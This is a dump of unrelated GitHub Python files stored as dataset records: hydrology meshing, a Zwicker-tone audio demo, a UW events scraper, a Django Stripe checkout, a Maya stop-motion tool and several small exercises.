logging.info(\"\")\n logging.info(\"Simplifying and pruning\")\n logging.info(\"========================\")\n logging.info(\"filtering rivers outside of the HUC space\")\n rivers = workflow.hydrography.filter_rivers_to_huc(hucs, rivers, tol)\n if len(rivers) is 0:\n return rivers\n\n logging.info(\"removing rivers with only a few reaches\")\n for i in reversed(range(len(rivers))):\n ltree = len(rivers[i])\n if ltree < args.prune_reach_size:\n rivers.pop(i)\n logging.info(\" removing river with %d reaches\"%ltree)\n else:\n logging.info(\" keeping river with %d reaches\"%ltree)\n if len(rivers) is 0:\n return rivers\n \n logging.info(\"simplifying rivers\")\n workflow.hydrography.cleanup(rivers, tol, tol, tol)\n\n logging.info(\"simplify HUCs\")\n workflow.hucs.simplify(hucs, tol)\n\n # snap\n logging.info(\"snapping rivers and HUCs\")\n rivers = workflow.hydrography.snap(hucs, rivers, tol, 10*tol, args.cut_intersections)\n \n logging.info(\"filtering cut reaches outside the HUC space\")\n rivers = workflow.hydrography.filter_rivers_to_huc(hucs, rivers, -0.1*tol)\n logging.info(\"...done\")\n\n logging.info(\"Resulting info\")\n if len(rivers) is not 0:\n mins = []\n for river in rivers:\n for line in river.dfs():\n coords = np.array(line.coords[:])\n dz = np.linalg.norm(coords[1:] - coords[:-1], 2, -1)\n mins.append(np.min(dz))\n logging.info(\" river min seg length: %g\"%min(mins))\n logging.info(\" river median seg length: %g\"%np.median(np.array(mins)))\n\n mins = []\n for line in hucs.segments:\n coords = np.array(line.coords[:])\n dz = np.linalg.norm(coords[1:] - coords[:-1], 2, -1)\n mins.append(np.min(dz))\n logging.info(\" HUC min seg length: %g\"%min(mins))\n logging.info(\" HUC median seg length: %g\"%np.median(np.array(mins)))\n return rivers\n \ndef triangulate(hucs, rivers, args, diagnostics=True):\n verbose = args.verbosity > 2\n \n logging.info(\"\")\n logging.info(\"Meshing\")\n logging.info(\"===============\")\n if args.refine_max_area is not None:\n refine_func = workflow.triangulate.refine_from_max_area(args.refine_max_area)\n elif args.refine_distance is not None:\n refine_func = workflow.triangulate.refine_from_river_distance(*args.refine_distance, rivers)\n else:\n def refine_func(*args, **kwargs):\n return False\n\n mesh_points, mesh_tris = workflow.triangulate.triangulate(hucs, rivers, verbose=verbose,\n refinement_func=refine_func)\n\n if diagnostics:\n logging.info(\"triangulation diagnostics\")\n river_multiline = workflow.tree.forest_to_list(rivers)\n distances = []\n areas = []\n needs_refine = []\n for tri in mesh_tris:\n vertices = mesh_points[tri]\n bary = np.sum(np.array(vertices), axis=0)/3\n bary_p = shapely.geometry.Point(bary[0], bary[1])\n distances.append(bary_p.distance(river_multiline))\n areas.append(workflow.utils.triangle_area(vertices))\n needs_refine.append(refine_func(vertices, areas[-1]))\n\n if args.verbosity > 0:\n plt.figure()\n plt.subplot(121)\n plt.hist(distances)\n plt.xlabel(\"distance from river of triangle centroids [m]\")\n plt.ylabel(\"count [-]\")\n plt.subplot(122)\n plt.scatter(distances, areas,c=needs_refine,marker='x')\n plt.xlabel(\"distance [m]\")\n plt.ylabel(\"triangle area [m^2]\") \n return mesh_points, mesh_tris\n\ndef elevate(mesh_points, dem, dem_profile):\n # -- must map back to lat/lon to take from dem\n logging.info(\"elevating\")\n triangles_3d = []\n mesh_points_ll = np.array(workflow.warp.warp_xy(mesh_points[:,0], mesh_points[:,1], workflow.conf.default_crs(), workflow.conf.latlon_crs())).transpose()\n elev = dem[workflow.rowcol.rowcol(dem_profile['affine'], mesh_points_ll[:,0], mesh_points_ll[:,1])]\n mesh_points_3 = np.zeros((len(mesh_points),3),'d')\n mesh_points_3[:,0:2] = mesh_points\n mesh_points_3[:,2] = elev\n return mesh_points_3\n \ndef save(filename, points3, tris, metadata):\n \"\"\"Save as a VTK mesh. \n\n This could be Exodus, but meshing_ats is in python2 (and uses exodus which is in python2)\n \"\"\"\n logging.info(\"saving mesh: %s\"%filename)\n cells = {'triangle':tris}\n vtk_io.write(filename, points3, cells)\n with open(filename+'.readme','w') as fid:\n fid.write(metadata)\n\n \n","repo_name":"q-rai/ideal-octo-waffle","sub_path":"workflow/hilev.py","file_name":"hilev.py","file_ext":"py","file_size_in_byte":14461,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"43"} +{"seq_id":"24911749432","text":"import streamlit as st\nimport numpy as np\nfrom scipy import fft\nimport matplotlib.pyplot as plt\n\nT = 60\n\ndef get_normalized_white_noise(sampling_frequency):\n white_noise = np.random.normal(size = (T*sampling_frequency))\n white_noise /= np.max(abs(white_noise))\n return white_noise\n\ndef apply_band_stop_filter(signal, sample_rate, low_pass, high_pass):\n ft = fft.rfft(signal)\n freq = fft.rfftfreq(signal.size, d = 1/sample_rate)\n\n band = (freq >= low_pass) * (freq <= high_pass)\n ft[band] = 0\n\n return fft.irfft(ft)\n\nst.title(\"The Zwicker Tone\")\n\nsampling_frequency = st.number_input(\"Sampling Frequency (Hz)\", min_value=1, max_value=352_800, value=44_100)\neffect_type = st.selectbox(\"Type\", [\"Monaural\",\"Binaural\", \"Alternating Silence\"])\n\nif effect_type == \"Binaural\":\n n_channels = 2\n slider_ranges = [st.slider(f\"Band-stop Filter for channel {channel + 1} (Hz)\", \n min_value = 0, \n max_value=sampling_frequency//2, \n value=[2_200, 3_300],\n step=100) for channel in range(n_channels)]\n signal = np.stack([apply_band_stop_filter(get_normalized_white_noise(sampling_frequency), \n sampling_frequency, \n slider_ranges[i][0], \n slider_ranges[i][1]) \n for i in range(n_channels)])\n \n # fig, ax = plt.subplots(2, 2)\n # fig.set_figheight(10)\n # fig.set_figwidth(20)\n\n # time = np.arange(0, T, 1/sampling_frequency)\n\n # ax[0][0].plot(time, signal[0])\n # ax[0][0].set_title(\"Channel 1 Audioform\")\n # ax[0][0].set_ylabel(\"Amplitude\")\n # ax[0][0].set_xlabel(\"Time (s)\")\n\n # ax[0][1].plot(time, signal[1])\n # ax[0][1].set_title(\"Channel 2 Audioform\")\n # ax[0][1].set_ylabel(\"Amplitude\")\n # ax[0][1].set_xlabel(\"Time (s)\")\n\n # ax[1][0].specgram(signal[0], Fs = sampling_frequency)\n # ax[1][0].set_title(\"Channel 1 Spectrograph\")\n # ax[1][0].set_ylabel(\"Frequency (Hz)\")\n # ax[1][0].set_xlabel(\"Time (s)\")\n \n # ax[1][1].specgram(signal[1], Fs = sampling_frequency)\n # ax[1][1].set_title(\"Channel 2 Spectrograph\")\n # ax[1][1].set_ylabel(\"Frequency (Hz)\")\n # ax[1][1].set_xlabel(\"Time (s)\")\n # st.pyplot(fig)\nelse:\n n_channels = 1\n slider_range = st.slider(f\"Band-stop Filter (Hz)\", \n min_value = 0, \n max_value=sampling_frequency//2, \n value=[2_200, 3_300],\n step=100) \n if effect_type == \"Alternating Silence\":\n noise_interval = st.number_input(\"Noise Interval Duration (ms)\", 0, T*1000, value=500)\n noise_samples= int(noise_interval/1000 * sampling_frequency)\n\n silence_interval = st.number_input(\"Silence Interval Duration (ms)\", 0, T*1000, value=500)\n silence_samples = int(silence_interval/1000 * sampling_frequency)\n\n signal = apply_band_stop_filter(get_normalized_white_noise(sampling_frequency), \n sampling_frequency, \n slider_range[0], \n slider_range[1])\n i = 0 \n while i*(noise_interval + silence_interval) < T*sampling_frequency:\n signal[noise_samples*i+silence_samples*i:noise_samples*i + silence_samples*(i+1)] = 0\n i+= 1\n\n # fig, ax = plt.subplots(2, 1)\n # fig.set_figheight(10)\n # fig.set_figwidth(20)\n\n # time = np.arange(0, T, 1/sampling_frequency)\n # ax[0].plot(time, signal)\n # ax[0].set_title(\"Audioform\")\n # ax[0].set_ylabel(\"Amplitude\")\n # ax[0].set_xlabel(\"Time (s)\")\n\n # ax[1].specgram(signal, Fs = sampling_frequency)\n # ax[1].set_title(\"Spectrograph\")\n # ax[1].set_ylabel(\"Frequency (Hz)\")\n # ax[1].set_xlabel(\"Time (s)\")\n # st.pyplot(fig)\n\n elif effect_type == \"Monaural\":\n\n signal = apply_band_stop_filter(get_normalized_white_noise(sampling_frequency), \n sampling_frequency, \n slider_range[0], \n slider_range[1])\n\n # fig, ax = plt.subplots(2, 1)\n # fig.set_figheight(10)\n # fig.set_figwidth(20)\n\n # time = np.arange(0, T, 1/sampling_frequency)\n # ax[0].plot(time, signal)\n # ax[0].set_title(\"Audioform\")\n # ax[0].set_ylabel(\"Amplitude\")\n # ax[0].set_xlabel(\"Time (s)\")\n\n # ax[1].specgram(signal, Fs = sampling_frequency)\n # ax[1].set_title(\"Spectrograph\")\n # ax[1].set_ylabel(\"Frequency (Hz)\")\n # ax[1].set_xlabel(\"Time (s)\")\n # st.pyplot(fig)\n\n\n\nst.audio(signal, sample_rate=sampling_frequency)","repo_name":"JKilgallen/zwicker_tone","sub_path":"web_app/zwicker_app.py","file_name":"zwicker_app.py","file_ext":"py","file_size_in_byte":4922,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"157433187","text":"# 반례 모음: https://bingorithm.tistory.com/13\n\n'''\n시간초과\n'''\n'''\nimport sys\ninput = sys.stdin.readline\n\nn, s = map(int, input().split())\nlst = list(map(int, input().split()))\nminLen = len(lst)\n\nfor num in lst:\n if num>=s:\n minLen = 1\n break\n\nl, r = 0, 1\nwhile l < r:\n # print(lst[l:r+1], sum(lst[l:r+1]))\n \n if sum(lst[l:r+1])>= s:\n minLen = min(minLen, r-l+1)\n # print('minLen: ',minLen)\n l += 1\n else:\n r += 1\nprint(minLen) \n'''\n\n'''\nsolution2 144ㅡms\n'''\nimport sys\ninput = sys.stdin.readline\n\nn, s = map(int, input().split())\nlst = list(map(int, input().split()))\n\ndef solve(s, lst):\n minLen = 100001\n total = 0\n l, r = 0, 0\n while True:\n if total >= s:\n minLen = min(minLen, r-l)\n total -= lst[l]\n l += 1 \n elif r == n:\n break\n else:\n total += lst[r]\n r += 1\n if minLen == 100001:\n return 0\n else:\n return minLen\n\n\nprint(solve(s, lst))\n","repo_name":"intensive-study/ps-cs-project-study","sub_path":"Problem Solving/04주차/부분합(이진).py","file_name":"부분합(이진).py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"43"} +{"seq_id":"21695087663","text":"import requests\nimport base64\nimport functions_framework\nimport re\n\nfrom bs4 import BeautifulSoup\n\nfrom datetime import date\nimport datetime\n\nfrom common import *\n\n\n# triggered from a message on a Cloud Pub/Sub topic.\n@functions_framework.cloud_event\ndef run_scrape_events(cloud_event):\n message = base64.b64decode(cloud_event.data[\"message\"][\"data\"]).decode()\n if message == \"scrape events\":\n print(\"running scrape events\")\n event_data = scrape_event_data()\n print(\n \"scraped \" + str(len(event_data)) + \" events successfully, publishing to DB\"\n )\n publish_to_db(event_data)\n\n\ndef changeToFullTime(hour, isPM):\n num_hours = 0\n if \":\" not in hour:\n num_hours = int(hour)\n hour = hour + \":00\"\n num_hours = int(hour[0]) if len(hour) == 4 else int(hour[0:2])\n\n if isPM:\n second_part = hour[1:] if num_hours < 10 else hour[2:]\n if num_hours != 12:\n num_hours += 12\n hour = str(num_hours) + second_part\n else:\n second_part = hour[1:] if num_hours < 10 else hour[2:]\n first_part = \"\"\n if num_hours == 12:\n first_part = \"00\"\n elif num_hours < 10:\n first_part = \"0\" + str(num_hours)\n else:\n first_part = str(num_hours)\n\n hour = first_part + second_part\n\n return hour\n\n\ndef convert(string, day):\n start = str(day)\n end = str(day)\n if string == \"All day\":\n start = start + \" 00:00\"\n end = end + \" 23:59\"\n ## Return array\n else:\n all_hours = re.findall(\"[0-9]+:?[0-9]*\", string)\n am = \"a.m.\" in string\n pm = \"p.m.\" in string\n\n if len(all_hours) == 1:\n hour = all_hours[0]\n if pm:\n hour = changeToFullTime(hour, True)\n else:\n hour = changeToFullTime(hour, False)\n\n start = start + \" \" + hour\n end = end + \" \" + hour\n\n else:\n hour1 = all_hours[0]\n hour2 = all_hours[1]\n\n if am and pm:\n hour1 = changeToFullTime(hour1, False)\n hour2 = changeToFullTime(hour2, True)\n elif pm:\n hour1 = changeToFullTime(hour1, True)\n hour2 = changeToFullTime(hour2, True)\n elif am:\n hour1 = changeToFullTime(hour1, False)\n hour2 = changeToFullTime(hour2, False)\n\n start = start + \" \" + hour1\n end = end + \" \" + hour2\n\n start = datetime.datetime.strptime(start, \"%Y-%m-%d %H:%M\")\n end = datetime.datetime.strptime(end, \"%Y-%m-%d %H:%M\")\n return [start, end]\n\n\ndef scrape_event_data() -> [Event]:\n time = date.today()\n\n events = []\n week = []\n for j in range(7):\n new_day = time + datetime.timedelta(days=j)\n week.append(str(new_day))\n\n for h in range(7):\n URL = \"https://today.wisc.edu/events/day/\" + week[h]\n page = requests.get(URL)\n\n soup = BeautifulSoup(page.content, \"html.parser\")\n results = soup.find(id=\"main\")\n\n iDs = re.findall(\"
  • \", page.text)\n\n ids = []\n for x in iDs:\n x = re.findall(\"[0-9]+\", x)[0]\n ids.append(x)\n i = 0\n details = results.find_all(\"div\", class_=\"event-details\")\n\n for detail in details:\n location = \"\"\n name = \"\"\n start = \"\"\n end = \"\"\n description = \"\"\n building = \"\"\n if detail is not None:\n if detail.find(\"p\", class_=\"event-location\") != -1:\n location = detail.find(\"p\", class_=\"event-location\")\n if location is not None:\n location = location.text.strip()\n else:\n location = detail.find(\"p\", class_=\"subtitle\")\n if location is not None:\n location = location.text.strip()\n else:\n location = detail.find(\"p\", class_=\"subtitle\")\n if location is not None:\n location = location.text.strip()\n\n if detail.find(\"h3\", class_=\"event-title\") != -1:\n name = detail.find(\"h3\", class_=\"event-title\")\n if name is not None:\n name = name.text.strip()\n\n if detail.find(\"p\", class_=\"event-time\") != -1:\n eventTime = detail.find(\"p\", class_=\"event-time\")\n if eventTime is not None:\n eventTime = eventTime.text\n start = convert(eventTime, week[h])[0]\n end = convert(eventTime, week[h])[1]\n else:\n start = convert(\"All day\", week[h])[0]\n end = convert(\"All day\", week[h])[1]\n else:\n start = convert(\"All day\", week[h])[0]\n end = convert(\"All day\", week[h])[1]\n\n id = ids[i]\n i += 1\n\n URL = \"https://today.wisc.edu/events/view/\" + str(id)\n page = requests.get(URL)\n soup = BeautifulSoup(page.content, \"html.parser\")\n results = soup.find(id=\"main\")\n if results.find(\"div\", class_=\"event-description\") != -1:\n description = results.find(\"div\", class_=\"event-description\")\n if description is not None:\n description = description.text.strip()\n\n event = Event(id, name, start, end, building, location, description)\n events.append(event)\n\n return events\n\n\ndef publish_to_db(event_data: [Event]):\n # clear all events in the db\n events_db.delete_many({})\n\n # convert the event data from array of classes to array of dictionaries (required by insert_many)\n doc = []\n for e in event_data:\n doc.append(e.__dict__)\n\n events_db.insert_many(doc)\n print(\"inserted all events into the DB!\")\n","repo_name":"gzhynko/madhacks2023","sub_path":"backend/scrape_events/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6080,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"24578132911","text":"from enum import Flag\nimport pickle\n\nclass flightGroup:\n #----------------------------------------------------------------------------------------------------------------------------------------------------\n def __init__(self, destination, dateLowerBound, dateUpperBound, stayRange, email, groupOrigins=None):\n # The __init__ function is the primary constructor for the class\n\n self.destination = destination # The Destination the Flight Group is heading to FORMAT (string): \"MSP\"\n self.dateLowerBound = dateLowerBound # The date the group would like to depart FORMAT (string): \"YYYY-MM-DD\" \n self.dateUpperBound = dateUpperBound # The date the group would like to return FORMAT (string): \"YYYY-MM-DD\"\n self.stayRange = stayRange # The length the group would like to stay FORMAT (tuple): (INT, INT)\n self.email = email # The email address associated with the group FORMAT (string): \"example@email.com\"\n \n if groupOrigins is None: # Home Airport-Passengers info FORMAT (list): [(\"LAX\", 3),...,(\"MAD\", 5)]\n self.groupOrigins = []\n else: self.groupOrigins = groupOrigins\n\n \n # Save pickles the instance\n #----------------------------------------------------------------------------------------------------------------------------------------------------\n def save(self): \n with open('flightGroupData.pkl', 'ab') as FGhandler:\n pickle.dump(self, FGhandler)\n \n # printinfo prints all information about the current group in a readable format\n #----------------------------------------------------------------------------------------------------------------------------------------------------\n def printinfo(self):\n print(\"Group Information: \")\n print(\"---------------------------------------------------------------------\")\n print(\"Your group is interested in traveling to: \" + self.destination)\n print(\"Sometime between \" + str(self.dateLowerBound) + \" and \" + str(self.dateUpperBound))\n print(\"And you are interested in a stay of \" + str(self.stayRange[0]) + \" to \" + str(self.stayRange[1]) + \" days\")\n print(\"Your contact email address is: \" + self.email)\n print(\"---------------------------------------------------------------------\")\n print(\"Traveler origins: \")\n for travelers in self.groupOrigins:\n print(str(travelers[1]) + \" Travelers from \" + travelers[0])","repo_name":"Owen-Hoglund/Flight-Tracker","sub_path":"flightGroupClassMk2.py","file_name":"flightGroupClassMk2.py","file_ext":"py","file_size_in_byte":2639,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"41634266241","text":"def caching_fibonacci():\n cache = {}\n def fibonacci(n):\n if n in cache:\n return cache[n]\n if n <= 1:\n return n\n fib = (fibonacci(n-1) + fibonacci(n-2))\n cache[n] = fib\n return fib\n return fibonacci\n\n\np = caching_fibonacci()\nprint(p(9))\n\n\n\n\n# def make_cached_fib():\n# cache = {}\n# def _(n):\n# if n in cache:\n# return cache[n]\n# if n <= 1:\n# return n\n# fib = (_(n-1) + _(n-2)) % 10\n# cache[n] = fib\n# return fib\n# return _\n\n# fib_last_digit_mem = make_cached_fib()\n","repo_name":"anfernee84/GOIT_AUTOCHEKS_ETC","sub_path":"module9/3-9.py","file_name":"3-9.py","file_ext":"py","file_size_in_byte":605,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"33664570924","text":"import json\nimport time\nimport datetime\nfrom util import *\n\ndef main(event):\n startTime = 1000*time.time()\n\n portfolio = event['body']['portfolio']\n portfolios = json.loads(open('data/portfolios.json', 'r').read())\n data = portfolios[portfolio]\n\n valid = True\n\n for trade in data:\n trddate = trade['TradeDate']\n # Tag ID: 75, Tag Name: TradeDate, Format: YYMMDD\n if len(trddate) == 6:\n try:\n datetime.datetime(int(trddate[0:2]), int(trddate[2:4]), int(trddate[4:6]))\n except ValueError:\n valid = False\n break\n else:\n valid = False\n break\n\n response = {'statusCode': 200, 'body': {'valid':valid, 'portfolio': portfolio}}\n endTime = 1000*time.time()\n return timestamp(response, event,startTime, endTime, 0)\n\n# if __name__==\"__main__\":\n# print(main({\"body\": {\"portfolioType\": \"S&P\",\"portfolio\": \"1234\"}}))\n","repo_name":"csl-iisc/faastlane","sub_path":"benchmarks/finra/trddate.py","file_name":"trddate.py","file_ext":"py","file_size_in_byte":951,"program_lang":"python","lang":"en","doc_type":"code","stars":18,"dataset":"github-code","pt":"43"} +{"seq_id":"2670143358","text":"import ast\nfrom docstring_extractor import get_docstrings\n\n\ndef print_docstrings(node, script):\n if isinstance(node, ast.FunctionDef):\n text_body = ast.get_source_segment(script, node)\n print(text_body)\n print(\"_____________________________________________________\")\n # print(node.body)\n for child in ast.iter_child_nodes(node):\n print_docstrings(child, script)\n\nwith open(\".tmp\", \"r\") as input_:\n content = input_.read()\n # docstrings = get_docstrings(input_)\n module = ast.parse(content)\n # function_definitions = [node for node in module.body if isinstance(node, ast.FunctionDef)]\n # for node in ast.iter_child_nodes(module):\n # for child in ast.iter_child_nodes(node):\n # print(child)\n # print(function_definitions)\n # print(docstrings)\n print_docstrings(module, content)\n\n\n \n","repo_name":"mmalofeev/ml_code_documentation_generation","sub_path":"docstring_extractor_test.py","file_name":"docstring_extractor_test.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"39367812127","text":"import stripe\nfrom django.shortcuts import render, redirect\nfrom .models import Item, ItemAPI\nfrom django.views import View\nfrom django.conf import settings\nfrom django.http import JsonResponse\n\n\ndef index(request):\n goods = Item.objects.all()\n data = {\n 'goods': goods,\n }\n return render(request, 'index.html', context=data)\n\n\ndef CreateCheckoutSessionView(request, *args, **kwargs):\n stripe.api_key = settings.STRIPE_SECRET_KEY\n YOUR_DOMAIN = 'http://127.0.0.1:8000'\n pk = kwargs.get('pk', None)\n good_item_id = ItemAPI.objects.get(pk=pk)\n checkout_session = stripe.checkout.Session.create(\n payment_method_types=['card'],\n line_items=[\n {\n \"price\": good_item_id.api_id,\n \"quantity\": 1,\n },\n ],\n currency='usd',\n mode='payment',\n success_url=YOUR_DOMAIN + '/success',\n cancel_url=YOUR_DOMAIN + '/cancel',\n )\n return redirect(checkout_session.url, code=303)\n\n\ndef success(request):\n return render(request, 'success.html')\n\n\ndef cancel(request):\n return render(request, 'cancel.html')\n\n\ndef goods_info(request, *args, **kwargs):\n pk = kwargs.get('pk', None)\n item = Item.objects.get(pk=pk)\n data = {\n 'good': item\n }\n return render(request, 'ptoduct_page.html', context=data)","repo_name":"mynameiszaurrr/sale_of_services_site","sub_path":"paypage/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"7585739347","text":"# Project Modules\nfrom utils import *\n\n# Qt Modules\nfrom PySide2.QtCore import *\nfrom PySide2.QtWidgets import *\nimport shiboken2 as shiboken\n\n# Maya Modules\nfrom maya import cmds, OpenMayaUI\n\nUI_NAME = 'stop_motion_UI'\nUI_TITLE = 'Stop Motion Tool'\n\n\ndef maya_to_qt(name, *args, **kwargs):\n\t\"\"\"\n\tMaya to QWidget\n\n\t:param str name: Maya name of an ui object\n\t:return: QWidget of parsed Maya name\n\t:rtype: QWidget\n\t\"\"\"\n\tptr = OpenMayaUI.MQtUtil.findControl(name)\n\tif ptr is None:\n\t\tptr = OpenMayaUI.MQtUtil.findLayout(name)\n\tif ptr is None:\n\t\tptr = OpenMayaUI.MQtUtil.findMenuItem(name)\n\tif ptr is not None:\n\t\treturn shiboken.wrapInstance(long(ptr), QWidget)\n\treturn ptr\n\n\ndef qt_to_maya(widget, *args, **kwargs):\n\t\"\"\"\n\tQWidget to Maya name\n\n\t:param QWidget widget: QWidget of a maya ui object\n\t:return: Maya name of parsed QWidget\n\t:rtype: str\n\t\"\"\"\n\treturn OpenMayaUI.MQtUtil.fullName(long(shiboken.getCppPointer(widget)[0]))\n\n\ndef get_maya_window(*args, **kwargs):\n\tptr = OpenMayaUI.MQtUtil.mainWindow()\n\tif ptr is not None:\n\t\treturn shiboken.wrapInstance(long(ptr), QWidget)\n\n\nclass FloatSlider(QWidget):\n\tvalueChanged = Signal(float)\n\n\tdef __init__(self, *args, **kwargs):\n\t\tQWidget.__init__(self, *args, **kwargs)\n\n\t\tself.currentValue = 0.5\n\n\t\t# Layout\n\t\tself.setLayout(QHBoxLayout())\n\n\t\t# Label\n\t\tself.label = QLabel('Ratio Control')\n\t\tself.layout().addWidget(self.label)\n\n\t\t# Float Field\n\t\tself.float_field = QDoubleSpinBox()\n\t\tself.float_field.setMinimum(0.0)\n\t\tself.float_field.setMaximum(1.0)\n\t\tself.float_field.setValue(0.5)\n\t\tself.float_field.setSingleStep(0.01)\n\t\tself.float_field.setFocusPolicy(Qt.ClickFocus)\n\t\tself.layout().addWidget(self.float_field)\n\n\t\t# Float Slider\n\t\tself.float_slider = QSlider(Qt.Horizontal)\n\t\tself.float_slider.setMinimum(0)\n\t\tself.float_slider.setMaximum(100)\n\t\tself.float_slider.setValue(50)\n\t\tself.layout().addWidget(self.float_slider)\n\n\t\t# Slots\n\t\tself.float_field.valueChanged.connect(self.field_callback)\n\t\tself.float_slider.valueChanged.connect(self.slider_callback)\n\n\tdef slider_callback(self, *args, **kwargs):\n\t\tvalue = self.float_slider.value()\n\t\tself.float_field.setValue(float(value) / 100.0)\n\t\tself.currentValue = float(value)\n\t\tself.valueChanged.emit(float(value))\n\t\treturn\n\n\tdef field_callback(self, *args, **kwargs):\n\t\tvalue = self.float_field.value()\n\t\tself.float_slider.setValue(int(value * 100.0))\n\t\tself.currentValue = float(value)\n\t\tself.valueChanged.emit(float(value))\n\t\treturn\n\n\nclass ProgressButton(QWidget):\n\tdef __init__(self, *args, **kwargs):\n\t\tQWidget.__init__(self, *args, **kwargs)\n\n\n# TODO: Preview Mode\nclass Window(QMainWindow):\n\tdef __init__(self, *args, **kwargs):\n\t\tQMainWindow.__init__(self, *args, **kwargs)\n\n\t\t# Variables\n\t\tself.progress_min = 0\n\t\tself.progress_max = 100\n\t\tself.progress_current = 0\n\n\t\t# Layout\n\t\tself.widget_main = QWidget()\n\t\tself.widget_main.setLayout(QVBoxLayout())\n\t\tself.setCentralWidget(self.widget_main)\n\t\tself.setMinimumWidth(400)\n\t\tself.setMaximumWidth(400)\n\n\t\t# Options\n\t\tself.group_options = QGroupBox('Options')\n\t\tself.group_options.setLayout(QVBoxLayout())\n\t\tself.widget_main.layout().addWidget(self.group_options)\n\n\t\t# Ratio Slider\n\t\tself.ratio_slider = FloatSlider()\n\t\tself.group_options.layout().addWidget(self.ratio_slider)\n\n\t\t# Row Layout\n\t\trowLayout = QHBoxLayout()\n\t\tself.group_options.layout().addLayout(rowLayout)\n\n\t\t# Dynamics\n\t\tself.checkbox_stepped = QCheckBox('Simulate Stepped')\n\t\tself.checkbox_stepped.setChecked(True)\n\t\trowLayout.addWidget(self.checkbox_stepped)\n\n\t\t# New Anim Layer\n\t\tself.checkbox_layer = QCheckBox('New Anim Layer')\n\t\tself.checkbox_layer.setChecked(True)\n\t\trowLayout.addWidget(self.checkbox_layer)\n\n\t\t# Dynamics\n\t\tself.checkbox_dyn = QCheckBox('Bake Dynamics')\n\t\tself.checkbox_dyn.setChecked(False)\n\t\trowLayout.addWidget(self.checkbox_dyn)\n\n\t\t# Spacer\n\t\tspacer = QSpacerItem(20, 18, QSizePolicy.Minimum, QSizePolicy.Expanding)\n\t\tself.group_options.layout().addItem(spacer)\n\n\t\t# Button\n\t\tself.button_simulate = QPushButton('Simulate')\n\t\tself.widget_main.layout().addWidget(self.button_simulate)\n\n\t\t# Progress Bar\n\t\t# self.progress_bar = QProgressBar()\n\t\t# self.progress_bar.setRange(self.progress_min, self.progress_max)\n\t\t# self.widget_main.layout().addWidget(self.progress_bar)\n\n\t\t# Thread\n\t\t# self.task_thread = SimulateThread()\n\n\t\t# Slots\n\t\tself.button_simulate.clicked.connect(self.simulate_callback)\n\n\t# self.task_thread.notifyProgress.connect(self.onProgress)\n\n\tdef onStart(self):\n\t\tself.task_thread.update_vars(nodes=cmds.ls(sl=True),\n\t\t\t\t\t\t\t\t\t ratio=self.ratio_slider.currentValue,\n\t\t\t\t\t\t\t\t\t is_layer=self.checkbox_layer.isChecked(),\n\t\t\t\t\t\t\t\t\t is_dynamic=self.checkbox_dyn.isChecked(),\n\t\t\t\t\t\t\t\t\t )\n\n\t\tself.task_thread.start()\n\n\tdef onProgress(self, index, *args, **kwargs):\n\t\tself.progress_bar.setValue(index)\n\t\treturn\n\n\t@undo\n\tdef simulate_callback(self, *args, **kwargs):\n\t\tis_simulate = self.checkbox_stepped.isChecked()\n\t\tis_layer = self.checkbox_layer.isChecked()\n\t\tis_dynamic = self.checkbox_dyn.isChecked()\n\t\tratio = self.ratio_slider.currentValue\n\t\ttime_range = get_time_range()\n\n\t\tselected = cmds.ls(sl=True)\n\n\t\tif not selected:\n\t\t\traise RuntimeError('Nothing Selected')\n\n\t\tlayer_name = None\n\t\tlayer_exceptions = []\n\t\trig = None\n\t\trig_names = []\n\t\tnew_items = []\n\n\t\tfor item in selected:\n\t\t\tnamespace = item.split(':')[0]\n\n\t\t\tif namespace:\n\t\t\t\trig = Apex_Rig(namespace=namespace)\n\n\t\t\t\tif rig.main_controls:\n\t\t\t\t\tfor control in rig.main_controls:\n\t\t\t\t\t\tif control not in selected:\n\t\t\t\t\t\t\tnew_items.append(control)\n\n\t\t\t\tif rig.dyn_controls:\n\t\t\t\t\tlayer_exceptions += rig.dyn_controls\n\n\t\t\t\tif hasattr(Apex_Name, namespace):\n\t\t\t\t\trig_name = getattr(Apex_Name, namespace)\n\n\t\t\t\t\tif rig_name not in rig_names:\n\t\t\t\t\t\trig_names.append(rig_name)\n\n\t\tif new_items:\n\t\t\tselected += new_items\n\n\t\tif rig_names:\n\t\t\tlayer_name = 'stopMotion_layer1'\n\t\t\tfor rig_name in rig_names:\n\t\t\t\tlayer_name = '{}_{}'.format(rig_name, layer_name)\n\n\t\t# Dynamics\n\t\tif is_dynamic and rig:\n\t\t\tif rig.dyn_joints:\n\t\t\t\trig.transfer_dyn_to_controls()\n\n\t\t# Animation Layers\n\t\tif is_layer:\n\t\t\tclean_anim_layers()\n\n\t\t\tif not layer_name:\n\t\t\t\tlayer_name = 'stoppedMotion1'\n\n\t\t\tlayer_name = create_anim_layer(layer_name)\n\n\t\t\t# Bake\n\t\t\tbake_to_layer(selected, layer_name)\n\n\t\t# Simulate\n\t\tif is_simulate:\n\t\t\tgenerate_stop_motion(selected,\n\t\t\t\t\t\t\t\t ratio=ratio,\n\t\t\t\t\t\t\t\t randomness=0.0,\n\t\t\t\t\t\t\t\t start=int(time_range[0]),\n\t\t\t\t\t\t\t\t end=int(time_range[-1]),\n\t\t\t\t\t\t\t\t layer=layer_name,\n\t\t\t\t\t\t\t\t )\n\n\t\t# Exceptions\n\t\tif is_layer and layer_exceptions:\n\t\t\tfor item in layer_exceptions:\n\t\t\t\tremove_from_anim_layer(item, layer_name)\n\t\treturn\n\n\ndef show(name=UI_NAME, title=UI_TITLE, *args, **kwargs):\n\tif cmds.window(name, exists=True):\n\t\tcmds.deleteUI(name, wnd=True)\n\n\t# Window\n\twindow = 